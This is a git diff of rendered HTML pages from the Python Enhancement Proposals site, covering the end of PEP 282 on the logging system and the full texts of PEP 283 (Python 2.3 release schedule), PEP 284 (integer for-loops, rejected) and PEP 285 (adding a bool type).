The FileHandler can be set up to create a rotating set of log +files. In this case, the file name passed to the constructor is +taken as a “base” file name. Additional file names for the +rotation are created by appending .1, .2, etc. to the base file +name, up to a maximum as specified when rollover is requested. +The setRollover method is used to specify a maximum size for a log +file and a maximum number of backup files in the rotation.

+
def setRollover(maxBytes, backupCount): ...
+
+
+

If maxBytes is specified as zero, no rollover ever occurs and the +log file grows indefinitely. If a non-zero size is specified, +when that size is about to be exceeded, rollover occurs. The +rollover method ensures that the base file name is always the most +recent, .1 is the next most recent, .2 the next most recent after +that, and so on.

+

There are many additional handlers implemented in the test/example +scripts provided with [6] - for example, XMLHandler and +SOAPHandler.

+
+
+

LogRecords

+

A LogRecord acts as a receptacle for information about a +logging event. It is little more than a dictionary, though it +does define a getMessage method which merges a message with +optional runarguments.

+
+
+

Formatters

+

A Formatter is responsible for converting a LogRecord to a string +representation. A Handler may call its Formatter before writing a +record. The following core Formatters will be implemented:

+
    +
  • Formatter: Provide printf-like formatting, using the % operator.
  • +
  • BufferingFormatter: Provide formatting for multiple +messages, with header and trailer formatting support.
  • +
+

Formatters are associated with Handlers by calling setFormatter() +on a handler:

+
def setFormatter(self, form): ...
+
+
+

Formatters use the % operator to format the logging message. The +format string should contain %(name)x and the attribute dictionary +of the LogRecord is used to obtain message-specific data. The +following attributes are provided:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
%(name)sName of the logger (logging channel)
%(levelno)sNumeric logging level for the message (DEBUG, +INFO, WARN, ERROR, CRITICAL)
%(levelname)sText logging level for the message (“DEBUG”, “INFO”, +“WARN”, “ERROR”, “CRITICAL”)
%(pathname)sFull pathname of the source file where the logging +call was issued (if available)
%(filename)sFilename portion of pathname
%(module)sModule from which logging call was made
%(lineno)dSource line number where the logging call was issued +(if available)
%(created)fTime when the LogRecord was created (time.time() +return value)
%(asctime)sTextual time when the LogRecord was created
%(msecs)dMillisecond portion of the creation time
%(relativeCreated)dTime in milliseconds when the LogRecord was created, +relative to the time the logging module was loaded +(typically at application startup time)
%(thread)dThread ID (if available)
%(message)sThe result of record.getMessage(), computed just as +the record is emitted
+

If a formatter sees that the format string includes “(asctime)s”, +the creation time is formatted into the LogRecord’s asctime +attribute. To allow flexibility in formatting dates, Formatters +are initialized with a format string for the message as a whole, +and a separate format string for date/time. The date/time format +string should be in time.strftime format. The default value for +the message format is “%(message)s”. The default date/time format +is ISO8601.

+

The formatter uses a class attribute, “converter”, to indicate how +to convert a time from seconds to a tuple. By default, the value +of “converter” is “time.localtime”. If needed, a different +converter (e.g. “time.gmtime”) can be set on an individual +formatter instance, or the class attribute changed to affect all +formatter instances.

+
+
+

Filters

+

When level-based filtering is insufficient, a Filter can be called +by a Logger or Handler to decide if a LogRecord should be output. +Loggers and Handlers can have multiple filters installed, and any +one of them can veto a LogRecord being output.

+
class Filter:
+    def filter(self, record):
+        """
+        Return a value indicating true if the record is to be
+        processed.  Possibly modify the record, if deemed
+        appropriate by the filter.
+        """
+
+
+

The default behaviour allows a Filter to be initialized with a +Logger name. This will only allow through events which are +generated using the named logger or any of its children. For +example, a filter initialized with “A.B” will allow events logged +by loggers “A.B”, “A.B.C”, “A.B.C.D”, “A.B.D” etc. but not “A.BB”, +“B.A.B” etc. If initialized with the empty string, all events are +passed by the Filter. This filter behaviour is useful when it is +desired to focus attention on one particular area of an +application; the focus can be changed simply by changing a filter +attached to the root logger.

+

There are many examples of Filters provided in [6].

+
+
+

Configuration

+

The main benefit of a logging system like this is that one can +control how much and what logging output one gets from an +application without changing that application’s source code. +Therefore, although configuration can be performed through the +logging API, it must also be possible to change the logging +configuration without changing an application at all. For +long-running programs like Zope, it should be possible to change +the logging configuration while the program is running.

+

Configuration includes the following:

+
    +
  • What logging level a logger or handler should be interested in.
  • +
  • What handlers should be attached to which loggers.
  • +
  • What filters should be attached to which handlers and loggers.
  • +
  • Specifying attributes specific to certain handlers and filters.
  • +
+

In general each application will have its own requirements for how +a user may configure logging output. However, each application +will specify the required configuration to the logging system +through a standard mechanism.

+

The most simple configuration is that of a single handler, writing +to stderr, attached to the root logger. This configuration is set +up by calling the basicConfig() function once the logging module +has been imported.

+
def basicConfig(): ...
+
+
+

For more sophisticated configurations, this PEP makes no specific +proposals, for the following reasons:

+
    +
  • A specific proposal may be seen as prescriptive.
  • +
  • Without the benefit of wide practical experience in the +Python community, there is no way to know whether any given +configuration approach is a good one. That practice can’t +really come until the logging module is used, and that means +until after Python 2.3 has shipped.
  • +
  • There is a likelihood that different types of applications +may require different configuration approaches, so that no +“one size fits all”.
  • +
+

The reference implementation [6] has a working configuration file +format, implemented for the purpose of proving the concept and +suggesting one possible alternative. It may be that separate +extension modules, not part of the core Python distribution, are +created for logging configuration and log viewing, supplemental +handlers and other features which are not of interest to the bulk +of the community.

+
+
+

Thread Safety

+

The logging system should support thread-safe operation without +any special action needing to be taken by its users.

+
+
+

Module-Level Functions

+

To support use of the logging mechanism in short scripts and small +applications, module-level functions debug(), info(), warn(), +error(), critical() and exception() are provided. These work in +the same way as the correspondingly named methods of Logger - in +fact they delegate to the corresponding methods on the root +logger. A further convenience provided by these functions is that +if no configuration has been done, basicConfig() is automatically +called.

+

At application exit, all handlers can be flushed by calling the function:

+
def shutdown(): ...
+
+
+

This will flush and close all handlers.

+
+
+

Implementation

+

The reference implementation is Vinay Sajip’s logging module [6].

+
+
+

Packaging

+

The reference implementation is implemented as a single module. +This offers the simplest interface - all users have to do is +“import logging” and they are in a position to use all the +functionality available.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0282.rst

+

Last modified: 2023-10-10 05:32:07 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0283/index.html b/pep-0283/index.html new file mode 100644 index 00000000000..a20a97bdc53 --- /dev/null +++ b/pep-0283/index.html @@ -0,0 +1,383 @@ + + + + + + + + PEP 283 – Python 2.3 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 283 – Python 2.3 Release Schedule

+
+
Author:
+
Guido van Rossum
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
27-Feb-2002
+
Python-Version:
+
2.3
+
Post-History:
+
27-Feb-2002
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 2.3. The schedule primarily concerns itself with PEP-sized +items. Small features may be added up to and including the first +beta release. Bugs may be fixed until the final release.

+

There will be at least two alpha releases, two beta releases, and +one release candidate. Alpha and beta releases will be spaced at +least 4 weeks apart (except if an emergency release must be made +to correct a blunder in the previous release; then the blunder +release does not count). Release candidates will be spaced at +least one week apart (excepting again blunder corrections).

+ + + + + + + + + + + + + + + + + + + + + + + + +
alpha 131 Dec 2002
alpha 219 Feb 2003
beta 125 Apr 2003
beta 229 Jun 2003
candidate 118 Jul 2003
candidate 224 Jul 2003
final29 Jul 2003
+
+
+

Release Manager

+

Barry Warsaw, Jeremy Hylton, Tim Peters

+
+
+

Completed features for 2.3

+

This list is not complete. See Doc/whatsnew/whatsnew23.tex in CVS +for more, and of course Misc/NEWS for the full list.

+
    +
  • Tk 8.4 update.
  • +
  • The bool type and its constants, True and False (PEP 285).
  • +
  • PyMalloc was greatly enhanced and is enabled by default.
  • +
  • Universal newline support (PEP 278).
  • +
  • PEP 263 Defining Python Source Code Encodings, Lemburg

    Implemented (at least phase 1, which is all that’s planned for +2.3).

    +
  • +
  • Extended slice notation for all built-in sequences. The patch +by Michael Hudson is now all checked in.
  • +
  • Speed up list iterations by filling tp_iter and other tweaks. +See https://bugs.python.org/issue560736; also done for xrange and +tuples.
  • +
  • Timeout sockets. https://bugs.python.org/issue555085
  • +
  • Stage B0 of the int/long integration (PEP 237). This means +issuing a FutureWarning about situations where hex or oct +conversions or left shifts returns a different value for an int +than for a long with the same value. The semantics do not +change in Python 2.3; that will happen in Python 2.4.
  • +
  • Nuke SET_LINENO from all code objects (providing a different way +to set debugger breakpoints). This can boost pystone by >5%. +https://bugs.python.org/issue587993, now checked in. (Unfortunately +the pystone boost didn’t happen. What happened?)
  • +
  • Write a pymemcompat.h that people can bundle with their +extensions and then use the 2.3 memory interface with all +Pythons in the range 1.5.2 to 2.3. (Michael Hudson checked in +Misc/pymemcompat.h.)
  • +
  • Add a new concept, “pending deprecation”, with associated +warning PendingDeprecationWarning. This warning is normally +suppressed, but can be enabled by a suitable -W option. Only a +few things use this at this time.
  • +
  • Warn when an extension type’s tp_compare returns anything except +-1, 0 or 1. https://bugs.python.org/issue472523
  • +
  • Warn for assignment to None (in various forms).
  • +
  • PEP 218 Adding a Built-In Set Object Type, Wilson

    Alex Martelli contributed a new version of Greg Wilson’s +prototype, and I’ve reworked that quite a bit. It’s in the +standard library now as the module sets, although some details +may still change until the first beta release. (There are no +plans to make this a built-in type, for now.)

    +
  • +
  • PEP 293 Codec error handling callbacks, Dörwald

    Fully implemented. Error handling in unicode.encode or +str.decode can now be customized.

    +
  • +
  • PEP 282 A Logging System, Mick

    Vinay Sajip’s implementation has been packagized and imported. +(Documentation and unit tests still pending.) +https://bugs.python.org/issue578494

    +
  • +
  • A modified MRO (Method Resolution Order) algorithm. Consensus +is that we should adopt C3. Samuele Pedroni has contributed a +draft implementation in C, see https://bugs.python.org/issue619475 +This has now been checked in.
  • +
  • A new command line option parser. Greg Ward’s Optik package +(http://optik.sf.net) has been adopted, converted to a single +module named optparse. See also +http://www.python.org/sigs/getopt-sig/
  • +
  • A standard datetime type. This started as a wiki: +http://www.zope.org/Members/fdrake/DateTimeWiki/FrontPage. A +prototype was coded in nondist/sandbox/datetime/. Tim Peters +has finished the C implementation and checked it in.
  • +
  • PEP 273 Import Modules from Zip Archives, Ahlstrom

    Implemented as a part of the PEP 302 implementation work.

    +
  • +
  • PEP 302 New Import Hooks, JvR

    Implemented (though the 2.3a1 release contained some bugs that +have been fixed post-release).

    +
  • +
  • A new pickling protocol. See PEP 307.
  • +
  • PEP 305 (CSV File API, by Skip Montanaro et al.) is in; this is +the csv module.
  • +
  • Raymond Hettinger’s itertools module is in.
  • +
  • PEP 311 (Simplified GIL Acquisition for Extensions, by Mark +Hammond) has been included in beta 1.
  • +
  • Two new PyArg_Parse*() format codes, ‘k’ returns an unsigned C +long int that receives the lower LONG_BIT bits of the Python +argument, truncating without range checking. ‘K’ returns an +unsigned C long long int that receives the lower LONG_LONG_BIT +bits, truncating without range checking. (SF 595026; Thomas +Heller did this work.)
  • +
  • A new version of IDLE was imported from the IDLEfork project +(http://idlefork.sf.net). The code now lives in the idlelib +package in the standard library and the idle script is installed +by setup.py.
  • +
+
+
+

Planned features for 2.3

+

Too late for anything more to get done here.

+
+
+

Ongoing tasks

+

The following are ongoing TO-DO items which we should attempt to +work on without hoping for completion by any particular date.

+
    +
  • Documentation: complete the distribution and installation +manuals.
  • +
  • Documentation: complete the documentation for new-style +classes.
  • +
  • Look over the Demos/ directory and update where required (Andrew +Kuchling has done a lot of this)
  • +
  • New tests.
  • +
  • Fix doc bugs on SF.
  • +
  • Remove use of deprecated features in the core.
  • +
  • Document deprecated features appropriately.
  • +
  • Mark deprecated C APIs with Py_DEPRECATED.
  • +
  • Deprecate modules which are unmaintained, or perhaps make a new +category for modules ‘Unmaintained’
  • +
  • In general, lots of cleanup so it is easier to move forward.
  • +
+
+
+

Open issues

+

There are some issues that may need more work and/or thought +before the final release (and preferably before the first beta +release): No issues remaining.

+
+
+

Features that did not make it into Python 2.3

+
    +
  • The import lock could use some redesign. (SF 683658.)
  • +
  • Set API issues; is the sets module perfect?

    I expect it’s good enough to stop polishing it until we’ve had +more widespread user experience.

    +
  • +
  • A nicer API to open text files, replacing the ugly (in some +people’s eyes) “U” mode flag. There’s a proposal out there to +have a new built-in type textfile(filename, mode, encoding). +(Shouldn’t it have a bufsize argument too?)

    Ditto.

    +
  • +
  • New widgets for Tkinter???

    Has anyone gotten the time for this? Are there any new +widgets in Tk 8.4? Note that we’ve got better Tix support +already (though not on Windows yet).

    +
  • +
  • Fredrik Lundh’s basetime proposal:

    http://effbot.org/ideas/time-type.htm

    +

    I believe this is dead now.

    +
  • +
  • PEP 304 (Controlling Generation of Bytecode Files by Montanaro) +seems to have lost steam.
  • +
  • For a class defined inside another class, the __name__ should be +"outer.inner", and pickling should work. (SF 633930. I’m no +longer certain this is easy or even right.)
  • +
  • reST is going to be used a lot in Zope3. Maybe it could become +a standard library module? (Since reST’s author thinks it’s too +unstable, I’m inclined not to do this.)
  • +
  • Decide on a clearer deprecation policy (especially for modules) +and act on it. For a start, see this message from Neal Norwitz: +https://mail.python.org/pipermail/python-dev/2002-April/023165.html +There seems insufficient interest in moving this further in an +organized fashion, and it’s not particularly important.
  • +
  • Provide alternatives for common uses of the types module;

    Skip Montanaro has posted a proto-PEP for this idea: +https://mail.python.org/pipermail/python-dev/2002-May/024346.html

    +

    There hasn’t been any progress on this, AFAICT.

    +
  • +
  • Use pending deprecation for the types and string modules. This +requires providing alternatives for the parts that aren’t +covered yet (e.g. string.whitespace and types.TracebackType). +It seems we can’t get consensus on this.
  • +
  • Deprecate the buffer object. +

    It seems that this is never going to be resolved.

    +
  • +
  • PEP 269 Pgen Module for Python, Riehl

    (Some necessary changes are in; the pgen module itself needs to +mature more.)

    +
  • +
  • Add support for the long-awaited Python catalog. Kapil +Thangavelu has a Zope-based implementation that he demoed at +OSCON 2002. Now all we need is a place to host it and a person +to champion it. (Some changes to distutils to support this are +in, at least.)
  • +
  • PEP 266 Optimizing Global Variable/Attribute Access, Montanaro

    PEP 267 Optimized Access to Module Namespaces, Hylton

    +

    PEP 280 Optimizing access to globals, van Rossum

    +

    These are basically three friendly competing proposals. Jeremy +has made a little progress with a new compiler, but it’s going +slow and the compiler is only the first step. Maybe we’ll be +able to refactor the compiler in this release. I’m tempted to +say we won’t hold our breath. In the meantime, Oren Tirosh has +a much simpler idea that may give a serious boost to the +performance of accessing globals and built-ins, by optimizing +and inlining the dict access: http://tothink.com/python/fastnames/

    +
  • +
  • Lazily tracking tuples? +

    Not much enthusiasm I believe.

    +
  • +
  • PEP 286 Enhanced Argument Tuples, von Loewis

    I haven’t had the time to review this thoroughly. It seems a +deep optimization hack (also makes better correctness guarantees +though).

    +
  • +
  • Make ‘as’ a keyword. It has been a pseudo-keyword long enough. +Too much effort to bother.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0283.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0284/index.html b/pep-0284/index.html new file mode 100644 index 00000000000..a3fdd65ace2 --- /dev/null +++ b/pep-0284/index.html @@ -0,0 +1,372 @@ + + + + + + + + PEP 284 – Integer for-loops | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 284 – Integer for-loops

+
+
Author:
+
David Eppstein <eppstein at ics.uci.edu>, +Gregory Ewing <greg.ewing at canterbury.ac.nz>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
01-Mar-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to simplify iteration over intervals of +integers, by extending the range of expressions allowed after a +“for” keyword to allow three-way comparisons such as

+
for lower <= var < upper:
+
+
+

in place of the current

+
for item in list:
+
+
+

syntax. The resulting loop or list iteration will loop over all +values of var that make the comparison true, starting from the +left endpoint of the given interval.

+
+
+

Pronouncement

+

This PEP is rejected. There were a number of fixable issues with +the proposal (see the fixups listed in Raymond Hettinger’s +python-dev post on 18 June 2005 [1]). However, even with the fixups the +proposal did not garner support. Specifically, Guido did not buy +the premise that the range() format needed fixing, “The whole point +(15 years ago) of range() was to avoid needing syntax to specify a +loop over numbers. I think it’s worked out well and there’s nothing +that needs to be fixed (except range() needs to become an iterator, +which it will in Python 3.0).”

+
+
+

Rationale

+

One of the most common uses of for-loops in Python is to iterate +over an interval of integers. Python provides functions range() +and xrange() to generate lists and iterators for such intervals, +which work best for the most frequent case: half-open intervals +increasing from zero. However, the range() syntax is more awkward +for open or closed intervals, and lacks symmetry when reversing +the order of iteration. In addition, the call to an unfamiliar +function makes it difficult for newcomers to Python to understand +code that uses range() or xrange().

+

The perceived lack of a natural, intuitive integer iteration +syntax has led to heated debate on python-list, and spawned at +least four PEPs before this one. PEP 204 (rejected) proposed +to re-use Python’s slice syntax for integer ranges, leading to a +terser syntax but not solving the readability problem of +multi-argument range(). PEP 212 (deferred) proposed several +syntaxes for directly converting a list to a sequence of integer +indices, in place of the current idiom

+
range(len(list))
+
+
+

for such conversion, and PEP 281 proposes to simplify the same +idiom by allowing it to be written as

+
range(list).
+
+
+

PEP 276 proposes to allow automatic conversion of integers to +iterators, simplifying the most common half-open case but not +addressing the complexities of other types of interval. +Additional alternatives have been discussed on python-list.

+

The solution described here is to allow a three-way comparison +after a “for” keyword, both in the context of a for-loop and of a +list comprehension:

+
for lower <= var < upper:
+
+
+

This would cause iteration over an interval of consecutive +integers, beginning at the left bound in the comparison and ending +at the right bound. The exact comparison operations used would +determine whether the interval is open or closed at either end and +whether the integers are considered in ascending or descending +order.

+

This syntax closely matches standard mathematical notation, so is +likely to be more familiar to Python novices than the current +range() syntax. Open and closed interval endpoints are equally +easy to express, and the reversal of an integer interval can be +formed simply by swapping the two endpoints and reversing the +comparisons. In addition, the semantics of such a loop would +closely resemble one way of interpreting the existing Python +for-loops:

+
for item in list
+
+
+

iterates over exactly those values of item that cause the +expression

+
item in list
+
+
+

to be true. Similarly, the new format

+
for lower <= var < upper:
+
+
+

would iterate over exactly those integer values of var that cause +the expression

+
lower <= var < upper
+
+
+

to be true.

+
+
+

Specification

+

We propose to extend the syntax of a for statement, currently

+
for_stmt: "for" target_list "in" expression_list ":" suite
+      ["else" ":" suite]
+
+
+

as described below:

+
for_stmt: "for" for_test ":" suite ["else" ":" suite]
+for_test: target_list "in" expression_list |
+        or_expr less_comp or_expr less_comp or_expr |
+        or_expr greater_comp or_expr greater_comp or_expr
+less_comp: "<" | "<="
+greater_comp: ">" | ">="
+
+
+

Similarly, we propose to extend the syntax of list comprehensions, +currently

+
list_for: "for" expression_list "in" testlist [list_iter]
+
+
+

by replacing it with:

+
list_for: "for" for_test [list_iter]
+
+
+

In all cases the expression formed by for_test would be subject to +the same precedence rules as comparisons in expressions. The two +comp_operators in a for_test must be required to be both of +similar types, unlike chained comparisons in expressions which do +not have such a restriction.

+

We refer to the two or_expr’s occurring on the left and right +sides of the for-loop syntax as the bounds of the loop, and the +middle or_expr as the variable of the loop. When a for-loop using +the new syntax is executed, the expressions for both bounds will +be evaluated, and an iterator object created that iterates through +all integers between the two bounds according to the comparison +operations used. The iterator will begin with an integer equal or +near to the left bound, and then step through the remaining +integers with a step size of +1 or -1 if the comparison operation +is in the set described by less_comp or greater_comp respectively. +The execution will then proceed as if the expression had been

+
for variable in iterator
+
+
+

where “variable” refers to the variable of the loop and “iterator” +refers to the iterator created for the given integer interval.

+

The values taken by the loop variable in an integer for-loop may +be either plain integers or long integers, according to the +magnitude of the bounds. Both bounds of an integer for-loop must +evaluate to a real numeric type (integer, long, or float). Any +other value will cause the for-loop statement to raise a TypeError +exception.

+
+
+

Issues

+

The following issues were raised in discussion of this and related +proposals on the Python list.

+
    +
  • Should the right bound be evaluated once, or every time through +the loop? Clearly, it only makes sense to evaluate the left +bound once. For reasons of consistency and efficiency, we have +chosen the same convention for the right bound.
  • +
  • Although the new syntax considerably simplifies integer +for-loops, list comprehensions using the new syntax are not as +simple. We feel that this is appropriate since for-loops are +more frequent than comprehensions.
  • +
  • The proposal does not allow access to integer iterator objects +such as would be created by xrange. True, but we see this as a +shortcoming in the general list-comprehension syntax, beyond the +scope of this proposal. In addition, xrange() will still be +available.
  • +
  • The proposal does not allow increments other than 1 and -1. +More general arithmetic progressions would need to be created by +range() or xrange(), or by a list comprehension syntax such as
    [2*x for 0 <= x <= 100]
    +
    +
    +
  • +
  • The position of the loop variable in the middle of a three-way +comparison is not as apparent as the variable in the present
    for item in list
    +
    +
    +

    syntax, leading to a possible loss of readability. We feel that +this loss is outweighed by the increase in readability from a +natural integer iteration syntax.

    +
  • +
  • To some extent, this PEP addresses the same issues as PEP 276. +We feel that the two PEPs are not in conflict since PEP 276 +is primarily concerned with half-open ranges starting in 0 +(the easy case of range()) while this PEP is primarily concerned +with simplifying all other cases. However, if this PEP is +approved, its new simpler syntax for integer loops could to some +extent reduce the motivation for PEP 276.
  • +
  • It is not clear whether it makes sense to allow floating point +bounds for an integer loop: if a float represents an inexact +value, how can it be used to determine an exact sequence of +integers? On the other hand, disallowing float bounds would +make it difficult to use floor() and ceiling() in integer +for-loops, as it is difficult to use them now with range(). We +have erred on the side of flexibility, but this may lead to some +implementation difficulties in determining the smallest and +largest integer values that would cause a given comparison to be +true.
  • +
  • Should types other than int, long, and float be allowed as +bounds? Another choice would be to convert all bounds to +integers by int(), and allow as bounds anything that can be so +converted instead of just floats. However, this would change +the semantics: 0.3 <= x is not the same as int(0.3) <= x, and it +would be confusing for a loop with 0.3 as lower bound to start +at zero. Also, in general int(f) can be very far from f.
  • +
+
+
+

Implementation

+

An implementation is not available at this time. Implementation +is not expected to pose any great difficulties: the new syntax +could, if necessary, be recognized by parsing a general expression +after each “for” keyword and testing whether the top level +operation of the expression is “in” or a three-way comparison. +The Python compiler would convert any instance of the new syntax +into a loop over the items in a special iterator object.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0284.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0285/index.html b/pep-0285/index.html new file mode 100644 index 00000000000..57c559acf62 --- /dev/null +++ b/pep-0285/index.html @@ -0,0 +1,511 @@ + + + + + + + + PEP 285 – Adding a bool type | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 285 – Adding a bool type

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
08-Mar-2002
+
Python-Version:
+
2.3
+
Post-History:
+
08-Mar-2002, 30-Mar-2002, 03-Apr-2002
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the introduction of a new built-in type, bool, +with two constants, False and True. The bool type would be a +straightforward subtype (in C) of the int type, and the values +False and True would behave like 0 and 1 in most respects (for +example, False==0 and True==1 would be true) except repr() and +str(). All built-in operations that conceptually return a Boolean +result will be changed to return False or True instead of 0 or 1; +for example, comparisons, the “not” operator, and predicates like +isinstance().

+
+
+

Review

+

I’ve collected enough feedback to last me a lifetime, so I declare +the review period officially OVER. I had Chinese food today; my +fortune cookie said “Strong and bitter words indicate a weak +cause.” It reminded me of some of the posts against this +PEP… :-)

+

Anyway, here are my BDFL pronouncements. (Executive summary: I’m +not changing a thing; all variants are rejected.)

+
    +
  1. Should this PEP be accepted?

    => Yes.

    +

    There have been many arguments against the PEP. Many of them +were based on misunderstandings. I’ve tried to clarify some of +the most common misunderstandings below in the main text of the +PEP. The only issue that weighs at all for me is the tendency +of newbies to write “if x == True” where “if x” would suffice. +More about that below too. I think this is not a sufficient +reason to reject the PEP.

    +
  2. +
  3. Should str(True) return “True” or “1”? “1” might reduce +backwards compatibility problems, but looks strange. +(repr(True) would always return “True”.)

    => “True”.

    +

    Almost all reviewers agree with this.

    +
  4. +
  5. Should the constants be called ‘True’ and ‘False’ (similar to +None) or ‘true’ and ‘false’ (as in C++, Java and C99)?

    => True and False.

    +

    Most reviewers agree that consistency within Python is more +important than consistency with other languages.

    +
  6. +
  7. Should we strive to eliminate non-Boolean operations on bools +in the future, through suitable warnings, so that for example +True+1 would eventually (in Python 3000) be illegal?

    => No.

    +

    There’s a small but vocal minority that would prefer to see +“textbook” bools that don’t support arithmetic operations at +all, but most reviewers agree with me that bools should always +allow arithmetic operations.

    +
  8. +
  9. Should operator.truth(x) return an int or a bool?

    => bool.

    +

    Tim Peters believes it should return an int, but almost all +other reviewers agree that it should return a bool. My +rationale: operator.truth() exists to force a Boolean context +on its argument (it calls the C API PyObject_IsTrue()). +Whether the outcome is reported as int or bool is secondary; if +bool exists there’s no reason not to use it. (Under the PEP, +operator.truth() now becomes an alias for bool(); that’s fine.)

    +
  10. +
  11. Should bool inherit from int?

    => Yes.

    +

    In an ideal world, bool might be better implemented as a +separate integer type that knows how to perform mixed-mode +arithmetic. However, inheriting bool from int eases the +implementation enormously (in part since all C code that calls +PyInt_Check() will continue to work – this returns true for +subclasses of int). Also, I believe this is right in terms of +substitutability: code that requires an int can be fed a bool +and it will behave the same as 0 or 1. Code that requires a +bool may not work when it is given an int; for example, 3 & 4 +is 0, but both 3 and 4 are true when considered as truth +values.

    +
  12. +
  13. Should the name ‘bool’ be changed?

    => No.

    +

    Some reviewers have argued for boolean instead of bool, because +this would be easier to understand (novices may have heard of +Boolean algebra but may not make the connection with bool) or +because they hate abbreviations. My take: Python uses +abbreviations judiciously (like ‘def’, ‘int’, ‘dict’) and I +don’t think these are a burden to understanding. To a newbie, +it doesn’t matter whether it’s called a waffle or a bool; it’s +a new word, and they learn quickly what it means.

    +

    One reviewer has argued to make the name ‘truth’. I find this +an unattractive name, and would actually prefer to reserve this +term (in documentation) for the more abstract concept of truth +values that already exists in Python. For example: “when a +container is interpreted as a truth value, an empty container +is considered false and a non-empty one is considered true.”

    +
  14. +
  15. Should we strive to require that Boolean operations (like “if”, +“and”, “not”) have a bool as an argument in the future, so that +for example “if []:” would become illegal and would have to be +written as “if bool([]):” ???

    => No!!!

    +

    Some people believe that this is how a language with a textbook +Boolean type should behave. Because it was brought up, others +have worried that I might agree with this position. Let me +make my position on this quite clear. This is not part of the +PEP’s motivation and I don’t intend to make this change. (See +also the section “Clarification” below.)

    +
  16. +
+
+
+

Rationale

+

Most languages eventually grow a Boolean type; even C99 (the new +and improved C standard, not yet widely adopted) has one.

+

Many programmers apparently feel the need for a Boolean type; most +Python documentation contains a bit of an apology for the absence +of a Boolean type. I’ve seen lots of modules that defined +constants “False=0” and “True=1” (or similar) at the top and used +those. The problem with this is that everybody does it +differently. For example, should you use “FALSE”, “false”, +“False”, “F” or even “f”? And should false be the value zero or +None, or perhaps a truth value of a different type that will print +as “true” or “false”? Adding a standard bool type to the language +resolves those issues.

+

Some external libraries (like databases and RPC packages) need to +be able to distinguish between Boolean and integral values, and +while it’s usually possible to craft a solution, it would be +easier if the language offered a standard Boolean type. This also +applies to Jython: some Java classes have separately overloaded +methods or constructors for int and boolean arguments. The bool +type can be used to select the boolean variant. (The same is +apparently the case for some COM interfaces.)

+

The standard bool type can also serve as a way to force a value to +be interpreted as a Boolean, which can be used to normalize +Boolean values. When a Boolean value needs to be normalized to +one of two values, bool(x) is much clearer than “not not x” and +much more concise than

+
if x:
+    return 1
+else:
+    return 0
+
+
+

Here are some arguments derived from teaching Python. When +showing people comparison operators etc. in the interactive shell, +I think this is a bit ugly:

+
>>> a = 13
+>>> b = 12
+>>> a > b
+1
+>>>
+
+
+

If this was:

+
>>> a > b
+True
+>>>
+
+
+

it would require a millisecond less thinking each time a 0 or 1 +was printed.

+

There’s also the issue (which I’ve seen baffling even experienced +Pythonistas who had been away from the language for a while) that +if you see:

+
>>> cmp(a, b)
+1
+>>> cmp(a, a)
+0
+>>>
+
+
+

you might be tempted to believe that cmp() also returned a truth +value, whereas in reality it can return three different values +(-1, 0, 1). If ints were not (normally) used to represent +Booleans results, this would stand out much more clearly as +something completely different.

+
+
+

Specification

+

The following Python code specifies most of the properties of the +new type:

+
class bool(int):
+
+    def __new__(cls, val=0):
+        # This constructor always returns an existing instance
+        if val:
+            return True
+        else:
+            return False
+
+    def __repr__(self):
+        if self:
+            return "True"
+        else:
+            return "False"
+
+    __str__ = __repr__
+
+    def __and__(self, other):
+        if isinstance(other, bool):
+            return bool(int(self) & int(other))
+        else:
+            return int.__and__(self, other)
+
+    __rand__ = __and__
+
+    def __or__(self, other):
+        if isinstance(other, bool):
+            return bool(int(self) | int(other))
+        else:
+            return int.__or__(self, other)
+
+    __ror__ = __or__
+
+    def __xor__(self, other):
+        if isinstance(other, bool):
+            return bool(int(self) ^ int(other))
+        else:
+            return int.__xor__(self, other)
+
+    __rxor__ = __xor__
+
+# Bootstrap truth values through sheer willpower
+False = int.__new__(bool, 0)
+True = int.__new__(bool, 1)
+
+
+

The values False and True will be singletons, like None. Because +the type has two values, perhaps these should be called +“doubletons”? The real implementation will not allow other +instances of bool to be created.

+

True and False will properly round-trip through pickling and +marshalling; for example pickle.loads(pickle.dumps(True)) will +return True, and so will marshal.loads(marshal.dumps(True)).

+

All built-in operations that are defined to return a Boolean +result will be changed to return False or True instead of 0 or 1. +In particular, this affects comparisons (<, <=, ==, !=, +>, >=, is, is not, in, not in), the unary operator ‘not’, the built-in +functions callable(), hasattr(), isinstance() and issubclass(), +the dict method has_key(), the string and unicode methods +endswith(), isalnum(), isalpha(), isdigit(), islower(), isspace(), +istitle(), isupper(), and startswith(), the unicode methods +isdecimal() and isnumeric(), and the ‘closed’ attribute of file +objects. The predicates in the operator module are also changed +to return a bool, including operator.truth().

+

